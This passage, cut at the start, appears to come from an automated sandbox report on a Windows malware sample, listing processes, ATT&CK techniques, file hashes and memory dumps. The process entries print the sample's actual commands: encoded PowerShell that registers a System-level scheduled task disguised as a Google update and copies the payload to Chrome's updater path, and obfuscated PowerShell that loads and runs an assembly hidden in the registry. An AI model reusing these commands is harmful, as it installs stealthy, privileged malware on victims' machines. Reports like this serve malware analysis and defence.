QAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdgB2AGUAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABvAHcAbgBsAG8AYQBkAHMAXABFAGQARQBZAE0AcgBwAEYAQgBOAGIAVABSAEgAbwAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeQBiAHoAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGgAYwBiAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:4156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3792

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b249759a-44d8-496f-a1f7-449dd254f48a}
1⤵
PID:4888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGUAcwBsACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBxAGUAIwA+AA=="
1⤵
PID:3784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

4

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ckj4gk4\imagestore.dat
Filesize
30KB

MD5
b1e46e2fd4b63cfc83043512e068b716

SHA1
c495e3d80ddf7048a28512112330a504a56370bd

SHA256
da09858b5bf3ffdd6ad82cc95da3a3071937965c5fc246f7c2e68209b18fb835

SHA512
2e75d4c0da75e0671ed22a94927bb03c302aaf1e69a0f296a20c1fe21289a44b1b3a6e4b42d24b8702115f22b5d779ddc412002dbd35f9e02dcfbe0be3abae8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe
Filesize
4.5MB

MD5
b7c12ce33a5c2de80bcd7083d839df6e

SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1

SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225

Download Submit
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe.101k0uc.partial
Filesize
4.5MB

MD5
b7c12ce33a5c2de80bcd7083d839df6e

SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1

SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225

Download Submit
memory/328-204-0x00007FF96E950000-0x00007FF96E960000-memory.dmp

Filesize
64KB

Download
memory/376-158-0x0000000000000000-mapping.dmp

Download
memory/588-202-0x00007FF96E950000-0x00007FF96E960000-memory.dmp

Filesize
64KB

Download
memory/676-203-0x00007FF96E950000-0x00007FF96E960000-memory.dmp

Filesize
64KB

Download
memory/832-145-0x0000000000000000-mapping.dmp

Download
memory/1060-166-0x0000000000000000-mapping.dmp

Download
memory/1360-153-0x0000000000000000-mapping.dmp

Download
memory/1380-154-0x0000000000000000-mapping.dmp

Download
memory/1752-164-0x0000000000000000-mapping.dmp

Download
memory/2204-157-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/2204-144-0x000000001C5F0000-0x000000001C602000-memory.dmp

Filesize
72KB

Download
memory/2204-137-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/2204-136-0x00000000005D0000-0x0000000000A56000-memory.dmp

Filesize
4.5MB

Download
memory/2204-134-0x0000000000000000-mapping.dmp

Download
memory/2256-167-0x0000000000000000-mapping.dmp

Download
memory/2304-165-0x0000000000000000-mapping.dmp

Download
memory/2508-178-0x0000000000000000-mapping.dmp

Download
memory/2508-180-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/2860-156-0x0000000000000000-mapping.dmp

Download
memory/3108-141-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/3108-140-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/3108-139-0x000001EFF5D30000-0x000001EFF5D52000-memory.dmp

Filesize
136KB

Download
memory/3108-138-0x0000000000000000-mapping.dmp

Download
memory/3344-150-0x0000000000000000-mapping.dmp

Download
memory/3452-147-0x0000000000000000-mapping.dmp

Download
memory/3524-152-0x0000000000000000-mapping.dmp

Download
memory/3536-148-0x0000000000000000-mapping.dmp

Download
memory/3580-160-0x0000000000000000-mapping.dmp

Download
memory/3688-171-0x0000000000000000-mapping.dmp

Download
memory/3696-146-0x0000000000000000-mapping.dmp

Download
memory/3720-149-0x0000000000000000-mapping.dmp

Download
memory/3792-187-0x0000000004680000-0x00000000046E6000-memory.dmp

Filesize
408KB

Download
memory/3792-201-0x0000000004C90000-0x0000000004CAE000-memory.dmp

Filesize
120KB

Download
memory/3792-186-0x0000000004610000-0x0000000004676000-memory.dmp

Filesize
408KB

Download
memory/3792-184-0x0000000003CE0000-0x0000000003D02000-memory.dmp

Filesize
136KB

Download
memory/3792-183-0x0000000003E70000-0x0000000004498000-memory.dmp

Filesize
6.2MB

Download
memory/3792-182-0x00000000036E0000-0x0000000003716000-memory.dmp

Filesize
216KB

Download
memory/3844-169-0x0000000000000000-mapping.dmp

Download
memory/3896-159-0x0000000000000000-mapping.dmp

Download
memory/4152-155-0x0000000000000000-mapping.dmp

Download
memory/4156-197-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4156-189-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp

Filesize
760KB

Download
memory/4156-196-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/4156-198-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp

Filesize
760KB

Download
memory/4156-188-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4156-185-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmp

Filesize
10.8MB

Download
memory/4260-143-0x0000000000000000-mapping.dmp

Download
memory/4272-142-0x0000000000000000-mapping.dmp

Download
memory/4304-163-0x0000000000000000-mapping.dmp

Download
memory/4328-170-0x0000000000000000-mapping.dmp

Download
memory/4632-161-0x0000000000000000-mapping.dmp

Download
memory/4676-176-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4676-173-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4676-174-0x0000000140001844-mapping.dmp

Download
memory/4676-175-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4676-177-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4784-172-0x0000000000000000-mapping.dmp

Download
memory/4888-190-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4888-195-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp

Filesize
760KB

Download
memory/4888-194-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4888-199-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4888-193-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4888-200-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4888-192-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4888-191-0x00000001400033F4-mapping.dmp

Download
memory/4928-151-0x0000000000000000-mapping.dmp

Download
memory/5028-162-0x0000000000000000-mapping.dmp

Download
memory/5100-168-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads